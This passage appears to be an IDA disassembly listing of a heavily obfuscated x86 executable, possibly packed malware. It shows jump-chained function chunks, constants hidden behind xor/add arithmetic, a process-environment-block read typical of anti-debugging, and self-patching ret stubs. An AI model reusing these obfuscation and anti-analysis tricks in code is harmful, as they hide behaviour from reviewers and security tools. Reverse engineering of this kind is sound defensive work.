; [00000001 BYTES: COLLAPSED FUNCTION nullsub_298. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		xor	eax, ecx
		jmp	loc_451534
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_45895C:				; CODE XREF: sub_445CCD:loc_43BBADj
		add	ebx, 0EDAAE6BFh
		xchg	ebx, [esp+0Ch+var_C]
		lea	eax, [ebp-2C8h]
		push	eax
		push	4C91A0h
		push	0D8918523h
		jmp	loc_451AC2
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------

loc_45897B:				; CODE XREF: hvvrg7ie:00445E52j
		sbb	edx, 10F019DFh

loc_458981:				; CODE XREF: hvvrg7ie:loc_457DB0j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_447177
		jmp	loc_4553A6

; =============== S U B	R O U T	I N E =======================================



sub_458992	proc near		; CODE XREF: sub_4462F9-7E08j
					; sub_441C2A+3613p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0045B489 SIZE 00000011 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xor	eax, ecx
		pop	ecx
		mov	edx, [esp-8+arg_4]
		push	ebp
		jmp	loc_45B489
sub_458992	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4589A2	proc near		; CODE XREF: sub_43A87E:loc_453BF9j

; FUNCTION CHUNK AT 0043D7BD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CE1D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045212E SIZE 0000000C BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		cmp	ds:dword_4510BC, 0
		jz	loc_45B14E
		mov	eax, ds:dword_4510BC
		jmp	loc_43D7BD
sub_4589A2	endp

; ---------------------------------------------------------------------------

locret_4589BD:				; CODE XREF: hvvrg7ie:loc_449623j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447610

loc_4589BE:				; CODE XREF: sub_447610:loc_459461j
		jmp	loc_43D523
; END OF FUNCTION CHUNK	FOR sub_447610
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449232

loc_4589C3:				; CODE XREF: sub_449232:loc_44280Ej
		jmp	loc_43EA45
; END OF FUNCTION CHUNK	FOR sub_449232
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43953B

loc_4589C8:				; CODE XREF: sub_43953B+8j
		jmp	loc_449EEB
; END OF FUNCTION CHUNK	FOR sub_43953B
; ---------------------------------------------------------------------------

loc_4589CD:				; CODE XREF: hvvrg7ie:00450826j
		sub	edi, 40A66284h

; =============== S U B	R O U T	I N E =======================================



sub_4589D3	proc near		; CODE XREF: hvvrg7ie:00445ECCp

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043B8CE SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043C50B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D6A3 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043FB41 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044034A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443E27 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004448A2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004473F3 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044834D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E991 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451843 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00451B21 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00456FC9 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00459892 SIZE 0000001C BYTES

		xchg	edi, [esp+0]
		pop	edi
		or	eax, eax
		jnz	loc_459892
		jmp	loc_43C50B
sub_4589D3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D47A

loc_4589E4:				; CODE XREF: sub_44D47A:loc_452002j
		pop	edi
; END OF FUNCTION CHUNK	FOR sub_44D47A
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_4589E5:				; CODE XREF: sub_4465A6+2j
					; sub_450C5A+Ej
		xchg	eax, edx
		call	sub_446A16

locret_4589EB:				; CODE XREF: hvvrg7ie:loc_45B719j
		retn
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------

loc_4589EC:				; CODE XREF: hvvrg7ie:00455269j
		jmp	locret_44296E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D809

loc_4589F1:				; CODE XREF: sub_43D809+58C4j
		jmp	sub_43D809
; END OF FUNCTION CHUNK	FOR sub_43D809
; ---------------------------------------------------------------------------
		dw 4C7Bh
dword_4589F8	dd 77E60000h		; DATA XREF: sub_450C5A:loc_43E047r
					; sub_450C5A+6r
dword_4589FC	dd 93928AD2h, 916613A8h, 3636465Ch ; DATA XREF:	sub_450C5A-D0FBo
					; sub_4465A6+12D91o
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4405AA

loc_458A09:				; CODE XREF: sub_4405AA+EDC0j
		jmp	nullsub_333
; END OF FUNCTION CHUNK	FOR sub_4405AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44543A

loc_458A0E:				; CODE XREF: sub_44543A-2343j
		jmp	nullsub_357
; END OF FUNCTION CHUNK	FOR sub_44543A

; =============== S U B	R O U T	I N E =======================================



sub_458A13	proc near		; CODE XREF: sub_43A89A:loc_43D519j
					; hvvrg7ie:0043E6B5p ...

; FUNCTION CHUNK AT 00445C63 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044654D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C0EE SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00450F5B SIZE 00000005 BYTES

		jno	loc_445C63
		jmp	loc_44654D
sub_458A13	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_458A1E:				; CODE XREF: sub_44BCAE-6204j
		pop	ecx
		xor	ecx, 0AB35C894h
		test	ecx, 1000000h
		jmp	loc_43D0CB
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_458A30:				; CODE XREF: sub_4465A6-825Ej
		push	eax
		push	esi
		push	74901A6Ah
		pop	esi
		rol	esi, 7
		sub	esi, 6E2AEECAh
		test	esi, 8
		jmp	loc_448659
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45541B

loc_458A4C:				; CODE XREF: sub_45541B:loc_44C339j
		jnz	loc_458E19
		jmp	loc_444239
; END OF FUNCTION CHUNK	FOR sub_45541B

; =============== S U B	R O U T	I N E =======================================



sub_458A57	proc near		; CODE XREF: sub_44E04Cj
					; DATA XREF: sub_44B3F1+2C51o

; FUNCTION CHUNK AT 00439A50 SIZE 0000000B BYTES

		js	loc_439A50
		push	edi
		push	32A22C30h
		pop	edi
		xor	edi, 0BB02298Dh
		jmp	loc_457673
sub_458A57	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_458A6F:				; CODE XREF: sub_454099:loc_44DE67j
		mov	[edx], ecx
		jmp	loc_439B42
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------

loc_458A76:				; CODE XREF: hvvrg7ie:loc_43EEB4j
		call	sub_43A564
; START	OF FUNCTION CHUNK FOR sub_440631

loc_458A7B:				; CODE XREF: sub_440631+155CCj
		inc	dword ptr [ebp-20h]
		mov	eax, [ebp-1Ch]
		mov	eax, ds:dword_44EE40[eax*4]
		mov	[ebp-8], eax
		cmp	dword ptr [ebp-8], 0
		jz	loc_43E736
; END OF FUNCTION CHUNK	FOR sub_440631
; START	OF FUNCTION CHUNK FOR sub_44E72F

loc_458A95:				; CODE XREF: sub_44E72F-FFFFj
					; sub_440643:loc_44CBC8j
		call	sub_456F9F
; END OF FUNCTION CHUNK	FOR sub_44E72F
; START	OF FUNCTION CHUNK FOR sub_447079

loc_458A9A:				; CODE XREF: sub_447079+6j
		jmp	sub_43FD5B
; END OF FUNCTION CHUNK	FOR sub_447079
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403B6

loc_458A9F:				; CODE XREF: sub_4403B6:loc_43E9A1j
		rol	eax, 4
		xor	eax, 0E93FC861h
		push	esi
		push	0D9FEBEDFh
		pop	esi
		and	esi, 85A72C1Ch
		jmp	loc_43DF35
; END OF FUNCTION CHUNK	FOR sub_4403B6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E8C

loc_458ABA:				; CODE XREF: sub_446E8C:loc_4489A4j
		cdq
		test	esi, eax
		jmp	loc_453C68
; END OF FUNCTION CHUNK	FOR sub_446E8C
; ---------------------------------------------------------------------------
		push	edi
		jmp	loc_43D81E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4398B7

loc_458AC8:				; CODE XREF: sub_4398B7+193D0j
		jz	loc_4528DC
		jmp	loc_456FFE
; END OF FUNCTION CHUNK	FOR sub_4398B7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4491A7

loc_458AD3:				; CODE XREF: sub_4491A7+AB63j
		call	sub_457C82

loc_458AD8:				; CODE XREF: sub_45B048:loc_454CE0j
		jmp	loc_454D14
; END OF FUNCTION CHUNK	FOR sub_4491A7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_458ADD:				; CODE XREF: sub_45B048-1A37Dj
					; hvvrg7ie:004523C8j
		jnz	loc_450276
		mov	eax, large fs:30h
		add	eax, 54h
		mov	eax, [eax]
		or	eax, eax
		jmp	loc_439CFB
; END OF FUNCTION CHUNK	FOR sub_45B048
; ---------------------------------------------------------------------------

locret_458AF6:				; CODE XREF: hvvrg7ie:00443488j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_458AF7:				; CODE XREF: sub_446D8D:loc_455744j
					; sub_457C08+Fj
		jmp	loc_4593B6
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C354

loc_458AFC:				; CODE XREF: sub_43C354+9j
		jmp	loc_4576F1
; END OF FUNCTION CHUNK	FOR sub_43C354
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_458B01:				; CODE XREF: sub_448BC0-F978j
		jmp	loc_458039
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------

locret_458B06:				; CODE XREF: hvvrg7ie:00440DB2j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_458B07:				; CODE XREF: sub_43E128+1A189j
		jmp	loc_44CC74
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44631F

loc_458B0C:				; CODE XREF: sub_44631F:loc_454784j
		xor	edx, 51470A65h
		add	edx, 56BDC8E7h
		xor	edx, 935DFBFAh
		add	edx, 6A0D7085h
		xchg	edx, [esp+0]

loc_458B27:				; CODE XREF: hvvrg7ie:loc_43E10Ej
		jmp	sub_454E54
; END OF FUNCTION CHUNK	FOR sub_44631F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4546E9

loc_458B2C:				; CODE XREF: sub_4546E9:loc_44A98Aj
		jnz	loc_444A65
		jmp	loc_43C277
; END OF FUNCTION CHUNK	FOR sub_4546E9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DE01

loc_458B37:				; CODE XREF: sub_43DE01+141DEj
					; hvvrg7ie:00451FF7j
		or	edx, ds:4000F5h
		xor	edx, 4F6D4544h

loc_458B43:				; CODE XREF: sub_43E163:loc_451855j
		add	edx, 17B1FEBEh
		mov	[edx], eax
		pop	edx
		jmp	loc_4592DD
; END OF FUNCTION CHUNK	FOR sub_43DE01
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458082

loc_458B51:				; CODE XREF: sub_458082-647Ej
		mov	edx, [esp+0]
		push	eax
		mov	eax, edx
		call	sub_4525FC
		mov	eax, [esp+0]

loc_458B5F:				; CODE XREF: hvvrg7ie:0044B5D5j
		jmp	loc_4563A7
; END OF FUNCTION CHUNK	FOR sub_458082
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448FB0

loc_458B64:				; CODE XREF: sub_448FB0:loc_455D14j
		push	eax
		call	sub_45202B
		mov	eax, [ebp-4]
		js	loc_444C0A
		add	eax, 28h
		push	edx
		push	31A598E1h
		jmp	loc_444893
; END OF FUNCTION CHUNK	FOR sub_448FB0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455087

loc_458B81:				; CODE XREF: sub_455087-1E1Ej
		xor	eax, 50723501h
		add	eax, ebp
		add	eax, 4B1684C7h
		mov	eax, [eax]
		jmp	loc_44EDDD
; END OF FUNCTION CHUNK	FOR sub_455087
; ---------------------------------------------------------------------------
		sub	edx, 30E87FEAh
		pop	ebx
		jmp	loc_43FDA0
; ---------------------------------------------------------------------------
		mov	[ebp-8], eax
		cmp	dword ptr [ebp-8], 0
		jz	loc_4434FE
		jmp	loc_43C8CB
; ---------------------------------------------------------------------------
		or	edx, ebx
		jmp	sub_459D4C
; ---------------------------------------------------------------------------

loc_458BBB:				; CODE XREF: hvvrg7ie:0044CAFDj
		call	sub_45329F
		mov	eax, 7DA6ACC0h
		push	esi
		push	0D4096ED4h
		pop	esi
		add	esi, 66C9C823h
		sub	esi, 8E2F0AA8h
		jmp	loc_44EB69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_458BDD:				; CODE XREF: sub_43F227:loc_447A01j
		jo	loc_44A96E
; END OF FUNCTION CHUNK	FOR sub_43F227

; =============== S U B	R O U T	I N E =======================================



sub_458BE3	proc near		; CODE XREF: sub_43E128+18AB7p
		xchg	ebx, [esp+0]
		pop	ebx
		xor	edx, 1D1B758Dh
		push	edi
		pushf
		push	2AA10AF4h
		jmp	loc_4554B2
sub_458BE3	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B851

loc_458BF9:				; CODE XREF: sub_43B851:loc_43ECFBj
					; hvvrg7ie:0045307Fj
		add	eax, 0DFDF0709h
		xchg	eax, [esp+0]
		jmp	sub_43C836
; END OF FUNCTION CHUNK	FOR sub_43B851
; ---------------------------------------------------------------------------

locret_458C07:				; CODE XREF: hvvrg7ie:loc_44D48Cj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E6B4

loc_458C08:				; CODE XREF: sub_44E6B4-3CB6j
		jmp	nullsub_343
; END OF FUNCTION CHUNK	FOR sub_44E6B4
; ---------------------------------------------------------------------------
		and	ebx, 0F4CD9095h
		jmp	sub_45B6DB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_253. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_458C19:				; CODE XREF: hvvrg7ie:004507D0j
		jmp	loc_43CA57
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439E6C

loc_458C1E:				; CODE XREF: sub_439E6C+1DF34j
		push	eax
		push	7B41B10Ah
		pop	eax
		and	eax, 0F6FF07CEh
		add	eax, 8E029D05h
		push	offset loc_442D2D
		jmp	loc_43ADDD
; END OF FUNCTION CHUNK	FOR sub_439E6C

; =============== S U B	R O U T	I N E =======================================



sub_458C3B	proc near		; CODE XREF: sub_445B46+5CBj
		push	ebx
		push	500D30FCh
		pop	ebx
		and	ebx, 41D32A67h
		xor	ebx, 333EFEEAh
		add	ebx, 8D01F29Eh
		mov	[ebx], eax
		push	offset sub_43D343

loc_458C5B:				; CODE XREF: hvvrg7ie:0044534Fj
		jmp	nullsub_345
sub_458C3B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_458C60:				; CODE XREF: sub_43AB99:loc_43A405j
		push	eax
		push	32D0BA56h
		pop	eax
		or	eax, 0CF2C3EB2h
		add	eax, 826D9D55h
		rol	eax, 0Eh
		jmp	loc_448395
; ---------------------------------------------------------------------------

loc_458C7B:				; CODE XREF: sub_43AB99+9E73j
		adc	esi, 778E0941h

loc_458C81:				; CODE XREF: sub_43AB99:loc_4449FDj
		call	sub_452278
; END OF FUNCTION CHUNK	FOR sub_43AB99
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_458C86:				; CODE XREF: sub_448BC0+F48Bj
		jmp	loc_440015
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------

loc_458C8B:				; CODE XREF: hvvrg7ie:00452809j
		mov	esi, ebx
; START	OF FUNCTION CHUNK FOR sub_453EFC

loc_458C8D:				; CODE XREF: sub_453EFC-1707j
		sub	edx, 88BAC89Eh
		rol	edx, 15h
		add	edx, 9004F3D8h
		mov	edx, [edx]
		call	sub_456535
; END OF FUNCTION CHUNK	FOR sub_453EFC
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_458CA3:				; CODE XREF: sub_43EB47+19A10j
		jmp	loc_4520D4
; END OF FUNCTION CHUNK	FOR sub_43EB47
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_458CA8:				; CODE XREF: sub_453405:loc_44CF9Fj
		and	edi, eax
		and	ebp, 9073CBF4h
		jmp	loc_444B95
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452F0E

loc_458CB5:				; CODE XREF: sub_452F0E-14D37j
		sub	al, 99h
		push	44F91F37h
		pop	edx
		xor	edx, 91F6F1E4h
		and	edx, 5B3F1880h
		xor	edx, 5A639882h
		add	edx, 1206674Ah
		add	edx, ebp
		jmp	loc_44E714
; END OF FUNCTION CHUNK	FOR sub_452F0E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44398A

loc_458CDC:				; CODE XREF: sub_44398A+12D99j
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_448B89
		jmp	loc_43AAB3
; END OF FUNCTION CHUNK	FOR sub_44398A
; ---------------------------------------------------------------------------
		mov	ds:dword_41D000, eax
		lea	eax, nullsub_308
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_308
; ---------------------------------------------------------------------------

loc_458CFF:				; CODE XREF: hvvrg7ie:loc_442F5Bj
		mov	eax, [esp]
		jmp	loc_457839
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454451

loc_458D07:				; CODE XREF: hvvrg7ie:0043D7B7j
					; sub_454451+33C7j
		or	eax, ds:4000F5h
		test	eax, 80000000h
		jmp	loc_43F9A0
; END OF FUNCTION CHUNK	FOR sub_454451
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E163

loc_458D18:				; CODE XREF: sub_43E163:loc_447248j
		shl	esi, 15h
		test	ebx, 8252A223h
		jmp	loc_447CD9
; END OF FUNCTION CHUNK	FOR sub_43E163
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413A5

loc_458D26:				; CODE XREF: sub_4413A5+8D07j
		pop	esi
		retn
; END OF FUNCTION CHUNK	FOR sub_4413A5

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_458D28	proc near		; CODE XREF: sub_44081B+5p
					; hvvrg7ie:loc_442465p

; FUNCTION CHUNK AT 00439F75 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044FD9D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045689A SIZE 00000011 BYTES

		push	esi
		mov	esi, ebp
		xchg	esi, [esp+0]
		mov	ebp, esp
		push	eax
		jmp	loc_44FD9D
sub_458D28	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_458D36	proc near		; CODE XREF: sub_448181-E16Fj
					; sub_44261C:loc_43B0F0p ...

; FUNCTION CHUNK AT 0043DB76 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044886C SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		push	edi
		push	99A89B62h
		pop	edi
		add	edi, ds:4000FAh
		xor	edi, 6F88E143h
		jmp	loc_44886C
sub_458D36	endp

; ---------------------------------------------------------------------------
		dw 3410h
dword_458D54	dd 77DD0000h		; DATA XREF: sub_43D16B+50C7r
					; sub_4557D4:loc_44BEE1w ...
dword_458D58	dd 16763285h, 6466A50Eh, 0C6639117h ; DATA XREF: sub_4557D4-15AEo
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451703

loc_458D65:				; CODE XREF: sub_451703-B8B8j
		jmp	loc_4587E7
; END OF FUNCTION CHUNK	FOR sub_451703
; ---------------------------------------------------------------------------
		dw 8705h
dword_458D6C	dd 5B8EFBCFh		; DATA XREF: sub_45488E-95F0r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E75B

loc_458D70:				; CODE XREF: sub_43E75B+1Cj
		jmp	loc_441D37
; END OF FUNCTION CHUNK	FOR sub_43E75B
; ---------------------------------------------------------------------------
		db 2Dh,	98h, 9Dh
dword_458D78	dd 0D1DF7580h		; DATA XREF: hvvrg7ie:loc_453DF3r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459B45

loc_458D7C:				; CODE XREF: sub_459B45-CF34j
		jmp	loc_439E38
; END OF FUNCTION CHUNK	FOR sub_459B45
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4396C7

loc_458D81:				; CODE XREF: sub_4396C7+Fj
		jmp	loc_44B325
; END OF FUNCTION CHUNK	FOR sub_4396C7
; ---------------------------------------------------------------------------
		dw 2401h
dword_458D88	dd 0EFBAC0Fh		; DATA XREF: sub_43B85Bw sub_43ECAA+5r
dword_458D8C	dd 0C144EFBAh		; DATA XREF: sub_43F227-1F71r
					; sub_459A10-1B9Fw
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E6A5

loc_458D90:				; CODE XREF: sub_44E6A5+8BB9j
		jmp	loc_454437
; END OF FUNCTION CHUNK	FOR sub_44E6A5
; ---------------------------------------------------------------------------
		align 2
		dw 0B1A8h
dword_458D98	dd 2C3BEEB0h		; DATA XREF: sub_452F78+7r
					; hvvrg7ie:004543CDw
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BFCF

loc_458D9C:				; CODE XREF: sub_43BFCF+4D8j
		jmp	nullsub_352
; END OF FUNCTION CHUNK	FOR sub_43BFCF
; ---------------------------------------------------------------------------
		db 0A7h, 0BCh, 0D8h
dword_458DA4	dd 0C030EFBAh		; DATA XREF: sub_43B3BE:loc_443C35w
					; sub_44D730+8r
; ---------------------------------------------------------------------------

loc_458DA8:				; CODE XREF: hvvrg7ie:004500CBj
		jmp	loc_43F49F
; ---------------------------------------------------------------------------

loc_458DAD:				; CODE XREF: hvvrg7ie:00447869j
		jmp	loc_44D8DA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414D3

loc_458DB2:				; CODE XREF: sub_4414D3+Aj
		jmp	loc_447A06
; END OF FUNCTION CHUNK	FOR sub_4414D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458374

loc_458DB7:				; CODE XREF: sub_458374+1Bj
		jnz	loc_44010A

loc_458DBD:				; CODE XREF: sub_454099+508Ej
		jmp	loc_453D84
; END OF FUNCTION CHUNK	FOR sub_458374
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B7D

loc_458DC2:				; CODE XREF: sub_455B7D+8j
		jmp	loc_439473
; END OF FUNCTION CHUNK	FOR sub_455B7D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B3F1

loc_458DC7:				; CODE XREF: sub_44B3F1+9583j
		jmp	loc_44E299
; END OF FUNCTION CHUNK	FOR sub_44B3F1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440413

loc_458DCC:				; CODE XREF: sub_440413+Dj
		jmp	sub_44059F
; END OF FUNCTION CHUNK	FOR sub_440413
; ---------------------------------------------------------------------------
		cmp	edx, 3AD34179h
		jmp	loc_453B5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4471CA

loc_458DDC:				; CODE XREF: sub_4471CA+Ej
		mov	edi, edx
		xchg	edi, [esp-4+arg_0]
		call	sub_45AB9D
		mov	eax, 0F074E076h
		call	sub_450C5A
		jmp	loc_43BE90
; END OF FUNCTION CHUNK	FOR sub_4471CA
; ---------------------------------------------------------------------------

loc_458DF5:				; CODE XREF: hvvrg7ie:0044602Aj
					; hvvrg7ie:loc_45A926j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_450C4C
		jmp	loc_44CAD0
; ---------------------------------------------------------------------------

loc_458E06:				; DATA XREF: sub_453405-11E5Ao
		pop	edx
		lea	eax, nullsub_61
		push	offset loc_44FE1E
		jmp	locret_43CB3A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45541B

loc_458E17:				; CODE XREF: sub_45541B-5934j
		sbb	ebx, ecx

loc_458E19:				; CODE XREF: sub_45541B:loc_458A4Cj
		push	ecx
		push	0ACF39B11h
		pop	ecx
		add	ecx, 41EC69D4h
		xor	ecx, 0BB734A76h
		jmp	loc_44D5B3
; END OF FUNCTION CHUNK	FOR sub_45541B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446B4C

loc_458E31:				; CODE XREF: sub_446B4C:loc_4397D3j
		mov	byte ptr [eax],	0C3h
		jmp	loc_44B88E
; END OF FUNCTION CHUNK	FOR sub_446B4C

; =============== S U B	R O U T	I N E =======================================



sub_458E39	proc near		; CODE XREF: sub_41A28F+132p
					; sub_458E39+5j
					; DATA XREF: ...
		call	sub_458E44
		jmp	ds:off_41D020
sub_458E39	endp


; =============== S U B	R O U T	I N E =======================================



sub_458E44	proc near		; CODE XREF: sub_459593:loc_456204j
					; sub_458E39p ...

; FUNCTION CHUNK AT 004457DE SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00445B3C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448CA7 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044A556 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0045A911 SIZE 00000005 BYTES

		pop	edx
		jns	loc_4457DE
		mov	eax, [esp+0]
		push	edx
		jmp	loc_45B3B9
sub_458E44	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44736C

loc_458E54:				; CODE XREF: sub_44736C+A8B5j
		jz	loc_443D7D
		jmp	loc_4420FA
; END OF FUNCTION CHUNK	FOR sub_44736C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BFCF

loc_458E5F:				; CODE XREF: sub_43BFCF+5E4Fj
		jb	loc_43C4A2
		not	edx

loc_458E67:				; CODE XREF: sub_43BFCF:loc_441E12j
		or	esi, 3B4E3776h
		and	esi, 1732DCBAh
		jmp	loc_43CD9C
; END OF FUNCTION CHUNK	FOR sub_43BFCF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447610

loc_458E78:				; CODE XREF: sub_447610-CF33j
		jnz	nullsub_132
		sub	edx, ebx
		jnb	loc_4501CA

loc_458E86:				; CODE XREF: sub_447610:loc_45945Bj
		mov	eax, 400h
		call	sub_44BF66
		mov	[ebp-8], eax
		call	sub_44C1F3
		push	ecx
		jmp	sub_4548C9
; END OF FUNCTION CHUNK	FOR sub_447610
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B2AC

loc_458E9E:				; CODE XREF: sub_45B2AC-FB9Fj
		jnz	loc_43C51C

loc_458EA4:				; CODE XREF: sub_447BD1+11FD5j
		jmp	loc_43F6B6
; END OF FUNCTION CHUNK	FOR sub_45B2AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449007

loc_458EA9:				; CODE XREF: sub_449007+DE42j
		jmp	sub_44F7CF
; END OF FUNCTION CHUNK	FOR sub_449007
; ---------------------------------------------------------------------------
		dw 0C0F7h
		dd 688230EEh, 0FFE301E9h
		db 0FFh
; ---------------------------------------------------------------------------

loc_458EB9:				; CODE XREF: hvvrg7ie:00447A63j
		xchg	esi, [eax]
		shl	eax, 1Bh

loc_458EBE:				; CODE XREF: hvvrg7ie:loc_439446j
		cmp	dword ptr [ebp-10h], 0
		setnz	byte ptr [ebp-5]
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_458EC6:				; CODE XREF: hvvrg7ie:0043BF7Bj
					; sub_43C989+6j ...
		mov	al, [ebp-5]
		mov	esp, ebp
		jmp	loc_4482CE
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------

loc_458ED0:				; DATA XREF: sub_43F98C+12EC0o
		push	edx
		push	eax
		push	2956141Fh
		pop	eax
		jmp	loc_445A5B
; ---------------------------------------------------------------------------

loc_458EDD:				; CODE XREF: hvvrg7ie:0045B59Fj
					; DATA XREF: hvvrg7ie:0045B595o
		jno	loc_45B4C9
		mov	eax, [esp]
